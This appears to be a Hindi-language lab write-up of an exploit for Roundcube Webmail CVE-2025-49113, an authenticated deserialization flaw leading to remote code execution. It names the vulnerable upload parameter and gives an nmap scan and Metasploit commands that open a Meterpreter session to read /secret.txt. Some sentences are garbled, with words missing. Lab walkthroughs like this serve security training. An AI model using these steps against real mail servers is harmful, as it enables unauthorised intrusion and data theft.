Roundcube Webmail CVE-2025-49113 (प्रमाणित PHP ऑब्जेक्ट डीसीरियलाइज़ेशन → RCE) के लिए हैंड्स-ऑन शोषण प्रयोगशाला, /secret.txt पढ़ने के लिए।
"अस्वीकरण: केवल शैक्षिक उपयोग के लिए"
यह रिपॉजिटरी /secret.txt में संग्रहीत गुप्त को प्राप्त करने के लिए एक नियंत्रित लैब में Roundcube Webmail CVE-2025-49113 के मेरे चरण-दर-चरण शोषण का दस्तावेजीकरण करती है।
⚠️ अस्वीकरण
सभी कार्य एक लैब / प्रशिक्षण वातावरण के विरुद्ध किए गए थे जिसका परीक्षण करने के लिए मैं अधिकृत हूँ।
उन प्रणालियों के विरुद्ध इन तकनीकों का उपयोग न करें जिनके आप स्वामी या प्रशासक नहीं हैं।
Roundcube Webmail एक ब्राउज़र-आधारित, ओपन-सोर्स PHP ईमेल क्लाइंट है जो IMAP के माध्यम से मेलबॉक्स से कनेक्ट होता है और SMTP के माध्यम से मेल भेजता है। यह आमतौर पर Apache या Nginx पर MySQL/PostgreSQL/SQLite के साथ चलता है और साझा होस्टिंग वातावरण में व्यापक रूप से उपयोग किया जाता है।
भेद्यता – CVE-2025-49113
Roundcube के सभी संस्करण 1.6.10 तक (और 1.5.x से पहले 1.5.10) में program/actions/settings/upload.php में एक महत्वपूर्ण बग है। _from पैरामीटर ठीक से मान्य नहीं किया गया है, जो एक प्रमाणित हमलावर को ट्रिगर करने और वेब सर्वर विशेषाधिकारों के साथ प्राप्त करने की अनुमति देता है।
लैब क्रेडेंशियल्स:
roundcubercpassलक्ष्य:
/secret.txtफ़ाइल के अंदर गुप्त क्या है?
nmapmsfconsole (Metasploit 6)172.20.2.57 पर Roundcube Webmailexploit/multi/http/roundcube_auth_rce_cve_2025_49113कमांड: nmap -sV Target Machine
msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine
meterpreter > cat /secret.txt